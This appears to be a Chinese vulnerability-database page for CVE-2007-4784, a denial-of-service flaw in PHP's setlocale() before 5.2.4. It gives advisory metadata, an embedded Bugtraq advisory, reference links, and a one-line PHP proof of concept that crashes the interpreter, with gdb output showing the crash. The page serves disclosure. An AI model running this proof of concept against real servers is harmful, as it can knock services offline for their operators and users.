PHP本地参数拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189205 漏洞类型 输入验证
发布时间 2007-09-10 更新时间 2009-02-05
CVE编号 CVE-2007-4784 CNNVD-ID CNNVD-200709-090
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://cxsecurity.com/issue/WLB-2007090031
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-090
|漏洞详情
PHP是广泛使用的通用的脚本语言,特别适合于Web开发,可嵌入到HTML中。PHP的5.2.5之前版本中存在多个安全漏洞,包括:处理变量中的错误可能导致通过ini_set()函数覆盖httpd.conf中所设置的值引起拒绝服务。
|漏洞EXP
Application: PHP < 5.2.4
Web Site: http://php.net
Platform: unix
Bug: denial of service
fonction: setlocale()
special condition: default php-memory-limit
-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credits
===========
1) Introduction
===========

"PHP  is a widely-used general-purpose scripting language that
is especially suited for Web development and can be embedded into HTML."

======
2) Bug
======

setlocale() is vulnerable to a denial of service

=====
3)Proof of concept
=====

Proof of concept example :
<?php
setlocale(LC_COLLATE, str_repeat("A", 34438013));
?>

result:
(gdb) run ./1.php
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1215805760 (LWP 10504)]
0xb78a584b in setlocale () from /lib/tls/i686/cmov/libc.so.6

========
4)Greets
========
Ivanlef0u,Deimos,benji,soh,and everyones on worldnet: #futurezone & #nibbles

=====
5)Credits
=====

Laurent gaffie
contact : laurent.gaffie (at) gmail (dot) com [email concealed]
stay tuned, site comming soon ....

|参考资料

来源:BUGTRAQ
名称:20070904PHP<5.2.4setlocale()denialofservice
链接:http://www.securityfocus.com/archive/1/archive/1/478627/100/0/threaded
来源:OSVDB
名称:38687
链接:http://osvdb.org/38687
来源:XF
名称:php-setlocale-dos(36458)
链接:http://xforce.iss.net/xforce/xfdb/36458
来源:GENTOO
名称:GLSA-200710-02
链接:http://www.gentoo.org/security/en/glsa/glsa-200710-02.xml
来源:SREASON
名称:3114
链接:http://securityreason.com/securityalert/3114
来源:SECUNIA
名称:28658
链接:http://secunia.com/advisories/28658
来源:SECUNIA
名称:27102
链接:http://secunia.com/advisories/27102
来源:SUSE
名称:SUSE-SA:2008:004
链接:http://lists.opensuse.org/opensuse-security-announce/2008-01/msg00006.html